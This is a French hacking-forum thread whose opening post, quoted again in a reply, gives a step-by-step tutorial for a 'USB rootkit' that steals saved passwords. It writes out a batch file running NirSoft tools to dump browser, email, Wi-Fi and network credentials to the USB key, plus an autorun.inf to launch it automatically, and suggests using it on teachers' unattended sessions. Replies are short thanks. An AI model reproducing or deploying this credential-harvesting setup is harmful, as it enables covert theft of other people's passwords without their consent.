• Moyenne : 0 (0 vote(s))
  • 1
  • 2
  • 3
  • 4
  • 5

Récupérer mot de passe (USB rootkit)
Bonsoir tous le monde!

J'entame mon seconde tutoriel mais cette fois-ci dans la section "Hacking", nous allons mettre quelques fichiers dans votre clé usb pour récupérer des mot de passes (comme ceux de vos professeurs lorsque qu'ils laissent leur session ouverte ou autre).

Ce tutoriel est très simple, il vous suffit d'avoir une clé usb puis d'insérer les fichiers suivants :

Vous avez donc ceci :

[Image: usb-mot-de-passe.png]

Par la suite nous allons créer un fichier .bat, donc vous ouvrez le bloc-note en inscrivant :
Code :
@echo off
start WebBrowserPassView.exe /stext dossier1/WebBrowserPassView.txt
start mailpv.exe /stext dossier1/mailpv.txt
start WirelessKeyView.exe /stext dossier1/WirelessKeyView.txt
start netpass.exe /stext dossier1/netpass.txt

et vous enregistrer le tout sous launch.bat

Puis pour lancer automatiquement le launch.bat, nous allons créer un autorun.inf de la même manière (avec le bloc-note)
Code :
open=launch.bat

ACTION=’Le nom de la nouvelle option’
Après avoir fait tout cela, votre clé usb est désormais fonctionnelle pour aspirer les mot de passes enregistrés dans l'ordinateur concerné.

PS : Cette méthode ne fonctionne uniquement si des mot de passes sont enregistrés dans l'ordinateur, sinon rien ne sera affiché !

Réagissez en postant un commentaire !

Source : funinf*****
Répondre
thanks friend're the best
Répondre
Intéréssant sa retient tout mdp ?
Répondre
(03-24-2016, 06:15 PM)Saudey a écrit :
Bonsoir tous le monde!

J'entame mon seconde tutoriel mais cette fois-ci dans la section "Hacking", nous allons mettre quelques fichiers dans votre clé usb pour récupérer des mot de passes (comme ceux de vos professeurs lorsque qu'ils laissent leur session ouverte ou autre).

Ce tutoriel est très simple, il vous suffit d'avoir une clé usb puis d'insérer les fichiers suivants :

Vous avez donc ceci :

[Image: usb-mot-de-passe.png]

Par la suite nous allons créer un fichier .bat, donc vous ouvrez le bloc-note en inscrivant :
Code :
@echo off
start WebBrowserPassView.exe /stext dossier1/WebBrowserPassView.txt
start mailpv.exe /stext dossier1/mailpv.txt
start WirelessKeyView.exe /stext dossier1/WirelessKeyView.txt
start netpass.exe /stext dossier1/netpass.txt

et vous enregistrer le tout sous launch.bat

Puis pour lancer automatiquement le launch.bat, nous allons créer un autorun.inf de la même manière (avec le bloc-note)
Code :
open=launch.bat

ACTION=’Le nom de la nouvelle option’
Après avoir fait tout cela, votre clé usb est désormais fonctionnelle pour aspirer les mot de passes enregistrés dans l'ordinateur concerné.

PS : Cette méthode ne fonctionne uniquement si des mot de passes sont enregistrés dans l'ordinateur, sinon rien ne sera affiché !

Réagissez en postant un commentaire !

Source : funinf*****

merci bcp mec
Répondre
Merci je
Répondre

Digg   Delicious   Reddit   Facebook   Twitter   StumbleUpon  

Atteindre :

Utilisateur(s) parcourant ce sujet :
1 visiteur(s)

A propos
Hack-Crack est une communauté ouverte à tous. Nous concentrons notre activité, notre documentation et nos discussions autour de thèmes qui tournent majoritairement autour du Cracking et du Hacking et de façon générale, l'informatique et la technologie. Toute activité illégale est prohibée et la documentation et les logiciels partagés par nos membres ne sauraient être utilisés à des fins illégales, tous les partages sont présents à titre éducationnel. Hack-Crack ne se porte aucunement garant des actions et des partages de ses membres.